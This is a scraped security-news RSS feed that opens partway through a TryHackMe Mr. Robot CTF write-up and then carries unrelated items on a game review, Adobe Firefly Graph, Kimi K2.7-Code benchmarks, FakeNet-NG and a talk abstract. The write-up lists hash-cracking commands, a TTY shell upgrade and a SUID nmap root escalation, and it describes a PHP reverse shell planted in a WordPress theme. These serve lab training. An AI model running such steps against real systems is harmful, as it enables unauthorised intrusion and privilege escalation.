"c3fcd3d76192e4007dfb496cca67e13b" &gt; hash.txt<br>john hash.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt</pre><p><strong>Option 3 — Hashcat:</strong></p><p>bash</p><pre>hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt</pre><p><strong>Result:</strong> abcdefghijklmnopqrstuvwxyz</p><h3>Spawning a Proper TTY Shell</h3><p>Before switching users, we need a fully interactive terminal. Our current shell is a limited “dumb” shell that doesn’t support su. Fix it with Python's pty module:</p><p>bash</p><pre>python -c 'import pty; pty.spawn("/bin/bash")'</pre><p>Now switch to the robot user:</p><p>bash</p><pre>su robot<br># Password: abcdefghijklmnopqrstuvwxyz</pre><p>Read the second key:</p><p>bash</p><pre>cat /home/robot/key-2-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 2:</em></strong><em> </em><em>822c73956184f694993bebb3eb32f0bf</em></blockquote><h3>Phase 6 — Privilege Escalation to Root</h3><p>With robot, we still can't read the third key (located in /root). We need to escalate to root.</p><h3>Finding SUID Binaries</h3><p>SUID (Set User ID) binaries run with the permissions of their <strong>owner</strong> (often root), regardless of who executes them. This is a common and powerful escalation vector.</p><p>bash</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Scan the results. Something unusual stands out:</p><pre>/usr/local/bin/nmap</pre><p><strong>Nmap with SUID?</strong> That’s misconfigured. Older versions of nmap (2.02–5.21) include an --interactive mode that allows shell command execution.</p><h3>GTFOBins — nmap Interactive Mode</h3><p>Verify on <a href="https://gtfobins.github.io/gtfobins/nmap/">GTFOBins</a>:</p><p>bash</p><pre>nmap --interactive</pre><p>Once in nmap’s interactive prompt:</p><pre>nmap&gt; !sh</pre><p>Check your privilege level:</p><p>bash</p><pre>whoami<br># root</pre><p>You now have a root shell.</p><h3>Capturing the Final Key</h3><p>bash</p><pre>cat /root/key-3-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 3:</em></strong><em> </em><em>04787ddef27c3dee1ee161b21670b4e4</em></blockquote><h3>Attack Chain Summary</h3><pre>robots.txt disclosure<br>        ↓<br>Key 1 found (public file)<br>        ↓<br>WordPress discovered via gobuster<br>        ↓<br>Username enumerated via error message difference<br>        ↓<br>Password cracked via Hydra + fsocity.dic wordlist<br>        ↓<br>Admin access → PHP reverse shell injected into theme<br>        ↓<br>Shell as daemon → /home/robot/ explored<br>        ↓<br>MD5 hash cracked → su robot → Key 2<br>        ↓<br>SUID nmap found → nmap --interactive → !sh → root<br>        ↓<br>Key 3 captured</pre><h3>Lessons Learned</h3><p><strong>1. robots.txt is not security.</strong> It’s a disclosure mechanism by design — never put sensitive file paths there.</p><p><strong>2. WordPress login pages expose usernames.</strong> The different error messages for “invalid username” vs “wrong password” enable user enumeration. This is a long-standing WordPress issue.</p><p><strong>3. Wordlist hygiene matters.</strong> Deduplicating fsocity.dic reduced it from 858,160 to 11,451 entries — making the brute-force ~75x faster. Never throw raw wordlists at targets.</p><p><strong>4. Theme editors are code execution.</strong> Any CMS that lets admins write raw PHP to disk is one compromised account away from full RCE.</p><p><strong>5. SUID misconfigurations are everywhere.</strong> Always run find / -perm -u=s -type f 2&gt;/dev/null on post-exploitation. Cross-reference with GTFOBins.</p><p><strong>6. MD5 is not encryption.</strong> It’s a hashing algorithm, and short/predictable passwords will fall to rainbow tables instantly. Use bcrypt, Argon2, or scrypt for password storage.</p><h3>Tools Used</h3><p>Tool Purpose nmap Port scanning &amp; service enumeration gobuster Directory brute-forcing Burp Suite HTTP request interception &amp; analysis Hydra Credential brute-forcing WPScan WordPress-specific enumeration Pentest Monkey PHP Reverse Shell Remote code execution payload Netcat Reverse shell listener John the Ripper / Hashcat Hash cracking GTFOBins SUID exploitation reference</p><h3>Flags</h3><p>1073403c8a58a1f80d943455fb30724b9<br>2822c73956184f694993bebb3eb32f0bf<br>304787ddef27c3dee1ee161b21670b4e4</p><p><em>Thanks for reading. If you have questions or spotted a better path, drop a comment — I’m always up for discussing alternative techniques.</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.<br></em>and my <a href="https://tryhackme.com/p/alisalive.exe"><em>TryHackMe</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=f28d83777dde" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-mr-robot-ctf-full-write-up-f28d83777dde">TryHackMe — Mr. Robot CTF | Full Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Adventures of Elliot: The Millennium Tales review – a playable love letter to Zelda]]></title>
<description><![CDATA[PlayStation 5, Xbox, Nintendo Switch 2, PC; Team Asano/Square EnixUpbeat, charmingly retro RPG full of treasure-hunting, temple-roaming, monster-slaying and princess-saving is an absolute blast to playYou can’t help but wonder if developer Team Asano is in a private competition with itself to com...]]></description>
<link>https://tsecurity.de/de/3607606/it-nachrichten/the-adventures-of-elliot-the-millennium-tales-review-a-playable-love-letter-to-zelda/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607606/it-nachrichten/the-adventures-of-elliot-the-millennium-tales-review-a-playable-love-letter-to-zelda/</guid>
<pubDate>Thu, 18 Jun 2026 13:48:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>PlayStation 5, Xbox, Nintendo Switch 2, PC; Team Asano/Square Enix<br></strong>Upbeat, charmingly retro RPG full of treasure-hunting, temple-roaming, monster-slaying and princess-saving is an absolute blast to play</p><p></p><p>You can’t help but wonder if developer Team Asano is in a private competition with itself to come up with the most ridiculous name for a video game. Following Project Triangle Strategy and Bravely Default: Flying Fairy we have this mouthful: The Adventures of Elliot: The Millennium Tales. It’s a playable love letter to the Zelda adventures of yesteryear rendered in the studio’s trademark glorious 2D-HD art style, melding evocative pixel sprites with modern visual effects.</p><p>From west Philabieldia, born and raised, our hero is adventurer Elliot. The antagonist making trouble in the neighbourhood is a king’s dastardly aide intent on summoning an ancient evil. The story is pure after-school-TV schlock, fully voice-acted but still unafraid to make you sit through reams and reams of text, and the action comprises treasure-hunting, temple-roaming and dispatching monsters. It’s part Chrono Trigger, part Oracle of Seasons as our almost obnoxiously upbeat hero journeys through the ages in order to solve puzzles, tip his fedora and of course, save a princess.</p> <a href="https://www.theguardian.com/games/2026/jun/18/the-adventures-of-elliot-the-millennium-tales-review">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe: New Firefly Graph can turn creative workflows into reusable assets]]></title>
<description><![CDATA[Adobe’s Firefly Graph is now available to Creative Cloud customers, offering a node-based workflow tool designed to help business create content at scale with generative AI (genAI). 



With Firefly Graph, users can connect multiple tools in visual workflow, with each “node” performing a specific...]]></description>
<link>https://tsecurity.de/de/3605819/ai-nachrichten/adobe-new-firefly-graph-can-turn-creative-workflows-into-reusable-assets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605819/ai-nachrichten/adobe-new-firefly-graph-can-turn-creative-workflows-into-reusable-assets/</guid>
<pubDate>Wed, 17 Jun 2026 20:34:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Adobe’s <a href="https://business.adobe.com/blog/meet-firefly-graph" data-type="link" data-id="https://business.adobe.com/blog/meet-firefly-graph" target="_blank" rel="noreferrer noopener">Firefly Graph is now available to Creative Cloud customers</a>, offering a node-based workflow tool designed to help business create content at scale with generative AI (genAI). </p>



<p>With Firefly Graph, users can connect multiple tools in visual workflow, with each “node” performing a specific task before passing its output to the next node. This <a href="https://www.computerworld.com/article/4163220/adobe-bets-on-ai-agents-to-stay-at-the-center-of-marketing-workflows.html" data-type="link" data-id="https://www.computerworld.com/article/4163220/adobe-bets-on-ai-agents-to-stay-at-the-center-of-marketing-workflows.html">gives creative professionals more control over generated outputs</a>, according to Adobe, and makes it easier to try out ideas by swapping, adjusting or adding components.</p>



<p>For example, a user could start with a text prompt box that connects to a node that generates an image using an AI model from Adobe or third-parties such as Google and OpenAI. Further along the chain, the user could add nodes to remove a background or upscale an image, for instance, before producing an image, video or other asset ready for use.</p>



<p>Changing one aspect, such as adding a reference image or adapting the text prompt, would change the final output.</p>



<p>It’s an approach similar to node-based workflow tools such as ComfyUI — a startup valued at $500 million which <a href="https://techcrunch.com/2026/04/24/comfyui-hits-500m-valuation-as-creators-seek-more-control-over-ai-generated-media/" target="_blank" rel="noreferrer noopener">claims more than 4 million users</a>. Others include Weavy, <a href="https://www.calcalistech.com/ctechnews/article/byyrqlbjwg" target="_blank" rel="noreferrer noopener">acquired by Figma last year for a reported $200 million</a>. </p>



<p>With so many AI tools available to creative professionals, workflows can get complex and hard to replicate, said Elliot Sedegah, senior product marketing manager at Adobe. Firefly Graph provides access to more than 300 different node types, including images, video editing and AI generation tools across Adobe’s portfolio and third-party tools. </p>



<p>“Whether you’re working at a mom-and-pop shop or a larger enterprise, you’re looking for consistency and then bringing that into a workflow so that you’re not hopping in and out of different tools,” he said. “Putting all that together takes massive amount of time, and sometimes it’s very difficult to even know what you did.”</p>



<p>Once created, workflows can be shared across an organization as repeatable processes for other individuals or teams to use. “Think of that rock star creative that you have and the recipes they create: those are now canonized as workflows, as assets, that the rest of the organization can take and reuse over and over again,” said Sedegah.</p>



<p>In addition, while creative professionals are needed to created high quality assets, reusable workflows can be put into the hands of broader teams to create content for large audiences, said Sedegah.</p>



<p>Firefly Graph addresses a challenge that most large creative organizations face, said Lisa Gately, principal analyst at Forrester — namely that their best creative workflows “live inside the heads of a few experts.</p>



<p>“Teams can generate images and video with AI, but reproducing the exact sequences of creative decisions, model selections, edits, and refinements that lead to a high-quality result is difficult and inconsistent. Firefly Graph turns those workflows into reusable assets,” she said.<br></p>



<p>While other node-based workflows aim to address similar problems, Adobe’s pitch is that Firefly Graph provides customers with the benefit of integration into its product suite. </p>



<p>“Firefly is a full, broader AI creative studio, not just a node-based tool, so [Firefly Graph] is a part of a bigger picture,” said Sedegah. “The strength is having everything in one place with the tools that people know.” </p>



<p>“Where Adobe differentiates is in enterprise integration,” said Gately, with Adobe connecting Firefly Graph to a range of other Adobe tools. Those include Creative Cloud applications; Firefly Boards for ideation; and Firefly Creative Production. </p>



<p>“The workflow becomes part of a broader content supply chain instead of a standalone creation tool,” she said. ”Organizations committed to other tools are unlikely to migrate for a node-based canvas — making a change is about the broader content supply chain.”</p>



<p>Project Firefly is available now to Adobe Creative Cloud for Enterprise subscribers (pricing details were not immediately available), and in a public beta for individual users; the wait list sign up is <a href="https://survey.adobe.com/jfe/form/SV_7VXFxdaIe7JlGOa" target="_blank" rel="noreferrer noopener">available here</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimi K2.7-Code cuts thinking tokens 30% — but practitioners say the benchmarks don't check out]]></title>
<description><![CDATA[Moonshot AI released Kimi K2.7-Code this week, an open-source update to its K2 coding model family, claiming leaner reasoning and double-digit performance gains.K2.7-Code is built on the same trillion-parameter mixture-of-experts architecture as its predecessor K2.6, and drops in via an OpenAI-co...]]></description>
<link>https://tsecurity.de/de/3594650/it-nachrichten/kimi-k27-code-cuts-thinking-tokens-30-but-practitioners-say-the-benchmarks-dont-check-out/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594650/it-nachrichten/kimi-k27-code-cuts-thinking-tokens-30-but-practitioners-say-the-benchmarks-dont-check-out/</guid>
<pubDate>Sat, 13 Jun 2026 00:25:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Moonshot AI released Kimi K2.7-Code this week, an open-source update to its <a href="https://venturebeat.com/ai/moonshots-kimi-k2-thinking-emerges-as-leading-open-source-ai-outperforming">K2 coding model </a>family, claiming leaner reasoning and double-digit performance gains.</p><p>K2.7-Code is built on the same trillion-parameter mixture-of-experts architecture as its p<a href="https://venturebeat.com/ai/kimi-k2-6-runs-agents-for-days-and-exposes-the-limits-of-enterprise-orchestration">redecessor K2.6</a>, and drops in via an OpenAI-compatible API — which matters for teams already running K2.6 in production gateways.</p><p>When K2.6 launched in April, it topped OpenRouter's weekly LLM leaderboard — a ranking based on actual API routing decisions by developers, not self-reported benchmark scores.</p><p>Moonshot AI says K2.7-Code addresses what it calls "overthinking," reducing thinking-token usage by 30% compared to K2.6 — a number that would directly affect inference costs for teams running agentic workflows. Whether that efficiency gain holds on independent benchmarks is a question practitioners have already started raising publicly.</p><h2>What Kimi K2.7-Code is</h2><p>K2.7-Code is released under a Modified MIT license, with weights available on HuggingFace. The model is deployable via vLLM or SGLang. It runs exclusively in thinking mode and does not support temperature adjustment — Moonshot AI has fixed it at 1.0, meaning teams cannot tune output determinism the way they might with other models.</p><p>The core change from K2.6 is how the model generates low-level code. Where K2.6 produced implementations by wrapping existing libraries and routing through established frameworks, K2.7-Code authors implementations directly. Moonshot AI says this produces more reliable generalization across Rust, Go and Python, and across task types including frontend development, DevOps and performance optimization.</p><p>On benchmark performance, Moonshot AI claims gains of 21.8% on Kimi Code Bench v2, 11% on Program Bench and 31.5% on MLS Bench Lite. All three are proprietary benchmarks run by Moonshot AI. The model has not been submitted to DeepSWE, an independent coding benchmark that produces a 70-point spread across models — compared to SWE-Bench Pro's 30-point spread — making it a more discriminating signal for teams configuring model routing systems.</p><div></div><h2>More honest, weaker for it</h2><p>The picture from outside Moonshot's own benchmarks is more complicated.</p><p>Researcher Elliot Arledge ran K2.7-Code against K2.6 and Claude Fable 5 on KernelBench-Hard, a public benchmark focused on GPU kernel optimization, and published his full run logs at kernelbench.com. </p><p>"K2.7 is more honest but not more capable," <a href="https://x.com/elliotarledge/status/2065443474560946615">Arledge wrote on X</a>. </p><p>On five of six problems, K2.7-Code produced real authored Triton kernels where K2.6 had used library wrappers. Two of those kernels failed on the model's own bugs. The MoE kernel result regressed from K2.6's score of 0.222 to 0.157. </p><p>"Fable, for reference, tops every cell it doesn't honestly fail," Arledge wrote.</p><p>Sugumaran Balasubramaniyan, a developer who built a model-task-router for the Hermes Agent platform using DeepSWE as his reference signal, responded publicly to the K2.7-Code release and challenged Moonshot AI directly on the benchmark choices.</p><p> "Respectfully, every model 'improves' double digits on its own test suite," <a href="https://x.com/sugumaran___/status/2065416166911205579">Balasubramaniyan wrote on X</a>. </p><p>He noted that K2.6 scored 24% on DeepSWE, tied with GPT-5.4-mini, and asked whether Moonshot AI would submit K2.7-Code to the same benchmark. </p><p>Balasubramaniyan said it took 13 review rounds to get the benchmark data right for his router and that he would route coding tasks to K2.7-Code if the independent numbers hold up.</p><div></div><h2>What this means for enterprises</h2><p>The token efficiency gain is immediately usable. Teams running K2.6 in production can swap in K2.7-Code via the OpenAI-compatible API and expect lower inference costs on agentic workflows without an architecture change. The 30% thinking-token reduction is Moonshot's own number, but the integration path is low-risk enough to test against your own workloads before committing.</p><p>The practical question is whether those efficiency gains hold on a team's own task distribution. Running K2.7-Code against your own workloads before adjusting gateway weights is the low-risk path to finding out.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FakeNet-NG Levels Up: Introducing Interactive HTML-Based Output]]></title>
<description><![CDATA[Written by: Beleswar Prasad Padhi, Tina Johnson, Michael Bailey, Elliot Chernofsky, Blas Kojusner

 
FakeNet-NG is a dynamic network analysis tool that captures network requests and simulates network services to aid in malware research. The FLARE team is committed to maintaining and updating the ...]]></description>
<link>https://tsecurity.de/de/3578866/it-security-nachrichten/fakenet-ng-levels-up-introducing-interactive-html-based-output/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578866/it-security-nachrichten/fakenet-ng-levels-up-introducing-interactive-html-based-output/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: <span data-sheets-root="1" data-sheets-userformat='{"2":13057,"3":{"1":0},"11":4,"12":0,"15":"Google Sans","16":8}' data-sheets-value='{"1":2,"2":"Beleswar Prasad Padhi, Tina Johnson, Michael Bailey, Elliot Chernofsky, Blas Kojusner"}'>Beleswar Prasad Padhi, Tina Johnson, Michael Bailey, Elliot Chernofsky, Blas Kojusner</span></p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p><a href="https://github.com/mandiant/flare-fakenet-ng" rel="noopener" target="_blank"><span>FakeNet-NG</span></a><span> is a dynamic network analysis tool that captures network requests and simulates network services to aid in malware research. The FLARE team is committed to maintaining and updating the tool to improve its capabilities and usability. FakeNet is compatible across platforms and extensively customizable; however, we recognized a need to present captured network data in a more intuitive and user-friendly way to help you quickly identify relevant Network-Based Indicators (NBIs). To address this challenge and further enhance the usability, we extended FakeNet-NG to generate HTML-based output that enables you to view, explore, and share captured network data.</span></p>
<p><span>This feature was implemented by </span><a href="https://github.com/3V3RYONE" rel="noopener" target="_blank"><span>Beleswar Prasad Padhi</span></a><span> as part of a </span><a href="https://summerofcode.withgoogle.com/programs/2023/projects/fRVAltDd" rel="noopener" target="_blank"><span>Google Summer of Code (GSoC)</span></a><span> project that the Mandiant FLARE team mentored in 2023. To learn more about the program and our open-source contributors, check out the </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/flare-tools-google-summer-of-code-2023"><span>introductory post</span></a><span>.</span></p>
<h2><span>Interactive HTML-Based Output</span></h2>
<p><span>FakeNet-NG's new interactive output is backed by an HTML page coupled with inline CSS and Javascript. Figure 1 shows the new HTML-based output and Figure 2 shows FakeNet-NG's existing text-based output.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fakenet-summer-of-code-fig1.max-1000x1000.png" alt="FakeNet-NG's new HTML-based output">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="gne8u">Figure 1: FakeNet-NG's new HTML-based output</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fakenet-summer-of-code-fig2d.max-1000x1000.png" alt="FakeNet-NG's text-based output">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="gne8u">Figure 2: FakeNet-NG's text-based output</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>FakeNet-NG generates each report using a </span><a href="https://palletsprojects.com/p/jinja/" rel="noopener" target="_blank"><span>Jinja2</span></a><span> template that it populates with the captured network data. The final report is saved to the current working directory and can be reviewed using your favorite browser. You can also share this file with others to collaboratively analyze the captured network traffic.</span></p>
<p><span>The HTML interface supports selecting, filtering, and copying captured network data. The filtering functionality displays entries that match your search query, as shown in Figure 3.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fakenet-summer-of-code-fig3b.max-1000x1000.png" alt="Filtered results showing only entries containing search query ‘evil.com'">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="d95cx">Figure 3: Filtered results showing only entries containing search query ‘evil.com'</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>You can copy Markdown-formatted network data by clicking the "Copy" button under the "Actions" column, as shown in Figure 3 to obtain results as shown in Figure 4.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fakenet-summer-of-code-fig4.max-1000x1000.png" alt="Viewing Markdown-formatted network data">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="d95cx">Figure 4: Viewing Markdown-formatted network data</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>You can also copy multiple entries by selecting their corresponding checkboxes and then clicking the "Copy Selected NBIs" button at the top of the page, as shown in Figure 5 and Figure 6.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fakenet-summer-of-code-fig5a.max-1000x1000.png" alt="Copying multiple entries by selecting corresponding checkboxes">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="d95cx">Figure 5: Copying multiple entries by selecting corresponding checkboxes</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fakenet-summer-of-code-fig6.max-1000x1000.png" alt="Viewing multiple Markdown-formatted entries">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="a1x9h">Figure 6: Viewing multiple Markdown-formatted entries</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2><span>Design and Implementation</span></h2>
<h3><span>FakeNet-NG Internals</span></h3>
<p><span>FakeNet-NG operates through a modular architecture consisting of three primary components including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Diverter:</strong><span> This central component intercepts all incoming and outgoing network traffic from the target system. By default, it forwards these packets to the Proxy Listener for further processing.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Proxy Listener:</strong><span> This component sits between the Diverter and the protocol-specific Listeners. It analyzes application layer data to identify the appropriate Listener for each network packet based on factors like port, protocol, and data content.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Protocol-specific Listeners:</strong><span> These specialized Listeners, such as those for HTTP, FTP, and DNS, handle requests specific to their respective protocols and generate appropriate responses to mimic legitimate server behavior.</span></p>
</li>
</ul>
<p><span>This modular design, shown in Figure 7, allows for flexibility and extensibility, enabling the addition of new protocol listeners as needed.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fakenet-summer-of-code-fig7.max-1000x1000.png" alt="FakeNet-NG's architecture">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="a1x9h">Figure 7: FakeNet-NG's architecture</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>More extensive documentation on FakeNet-NG's internal workings can be found on </span><a href="https://github.com/mandiant/flare-fakenet-ng/tree/master/docs" rel="noopener" target="_blank"><span>GitHub</span></a><span>.</span></p>
<h3><span>Extending FakeNet-NG for NBI Analysis</span></h3>
<p><span>Enabling FakeNET-NG to generate comprehensive and informative reports required extending key components to record, store, and associate network data with the source processes. This included:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Enhancing data storage:</strong><span> The Diverter stores additional information, including process names, process IDs, and relationships between original and proxy-initiated source ports.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Introducing NBI mapping: </strong><span>The Diverter maps network data to source processes, enabling clear attribution of network activity.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Facilitating information exchange:</strong><span> The Proxy Listener relays relevant packet details to the Diverter, ensuring accurate data tracking.</span></p>
</li>
</ul>
<p><span>FakeNet-NG combines the data captured by each component to generate the interactive HTML-based output.</span></p>
<h2><span>Future Work</span></h2>
<p><span>We believe that FakeNet-NG's HTML-based output can be further enhanced to provide even greater value to analysts. One key addition would be a communication graph that visually depicts network behavior, as shown in Figure 8. This common technique is employed by other networking tools to map processes to their associated network requests, with edges linking process nodes to other nodes such as IP addresses or domain names. Adding such a visualization to FakeNet-NG would help give you a clear and immediate understanding of a program's communication patterns.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fakenet-summer-of-code-fig8.max-1000x1000.png" alt="A prototype communication graph">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="a1x9h">Figure 8: A prototype communication graph</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Additionally, we are exploring other enhancements including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Exclude irrelevant network traffic:</strong><span> Filter noise generated by benign Windows services and applications drawing focus to the most relevant network data. See GitHub issue </span><a href="https://github.com/mandiant/flare-fakenet-ng/issues/183" rel="noopener" target="_blank"><span>here</span></a><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Include ICMP traffic in the HTML report: </strong><span>Provide a more comprehensive view of network activity by displaying ICMP-based network data. See GitHub issue </span><a href="https://github.com/mandiant/flare-fakenet-ng/issues/182" rel="noopener" target="_blank"><span>here</span></a><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Add filtering options and preset filters: </strong><span>Offer convenient filtering options as well as include preset filters to exclude common Microsoft network traffic. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Improve Markdown formatting:</strong><span> Enhance the usability of exported network data by allowing the user to choose the details that need to be included in the exported Markdown data.</span></p>
</li>
</ul>
<p><span>If you are interested in getting involved in the development of FakeNet-NG, these enhancements in addition to our list of </span><a href="https://github.com/mandiant/flare-fakenet-ng/labels/good%20first%20issue" rel="noopener" target="_blank"><span>good first issues</span></a><span> are a great way to get started.</span></p>
<h2><span>Conclusion</span></h2>
<p><span>FakeNet-NG continues to evolve as a go-to tool for dynamic network analysis in malware research. By adding interactive HTML-based output we hope to enhance its usability by giving you a clear, intuitive, and visually appealing way to navigate and analyze even the most extensive and complex network data captures.</span></p>
<p><span>We encourage you to explore the new HTML-based output and leverage its filtering, selection, and copying capabilities to streamline your dynamic network data analysis. We also welcome feedback and suggestions for further improvements. Please visit </span><a href="https://github.com/mandiant/flare-fakenet-ng" rel="noopener" target="_blank"><span>our Github repository</span></a><span> to download the latest version of FakeNet-NG, contribute to the project, or share your thoughts.</span></p>
<h2><span>Beleswar's Acknowledgements</span></h2>
<p><span>Participating in the Google Summer of Code Program, especially with FLARE, has been an excellent learning experience. This project has given me a deep understanding of network programming and systems programming. GSoC has also taught me to accept mentor feedback and code reviews positively and to work on them diligently. It has also helped me develop important soft skills like communication, time management, task scheduling, and progress tracking.</span></p>
<p><span>I want to express my thanks to FLARE for making the summer experience so smooth. I really appreciate the group kickoff meetings, which allowed us to interact and understand the projects and progress of fellow contributors. I also loved how all the mentors were approachable and always helped me overcome any roadblocks. I'm excited to continue contributing to the project and stay active in the FLARE community.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Going back in time with the Undoable Monad (bobkonf2026)]]></title>
<description><![CDATA[Slipshow is a presentation tool. One of its specificity is that it is
          not based on slides, but on an infinite canvas on which you can zoom
          or scroll. Yet, compared to Prezi, the source of a presentation is
          text.
          
          The way the author defines the dyn...]]></description>
<link>https://tsecurity.de/de/3529991/it-security-video/going-back-in-time-with-the-undoable-monad-bobkonf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529991/it-security-video/going-back-in-time-with-the-undoable-monad-bobkonf2026/</guid>
<pubDate>Tue, 19 May 2026 18:48:37 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Slipshow is a presentation tool. One of its specificity is that it is
          not based on slides, but on an infinite canvas on which you can zoom
          or scroll. Yet, compared to Prezi, the source of a presentation is
          text.
          
          The way the author defines the dynamic of its presentation is by
          intertwining actions in its textual content. Slipshow allows many
          actions, such as revealing new content, scrolling or zooming, starting
          an animation, or even starting a script defined by the user. This
          gives the author freedom in how they want to present.
          
          However, for Slipshow itself, this is a programming challenge: How to
          allow to go back in your presentation's steps? How to organize the
          code so that it's not restricting to adding new actions, and that it's
          easy to maintain?
          
          Originally written in JavaScript, Slipshow has suffered from bad
          design in this space. However, since its rewrite in OCaml, the
          opportunity to tackle this problem has been taken, with great success
          and much more stability, using the Undoable Monad.
          
          Monads are a way to embed a &quot;computing&quot; DSL in a programming
          language. They allow to define a &quot;variant&quot; of computation (for
          instance &quot;concurrent programming&quot;) and let the user program in that
          new way, almost transparently.
          
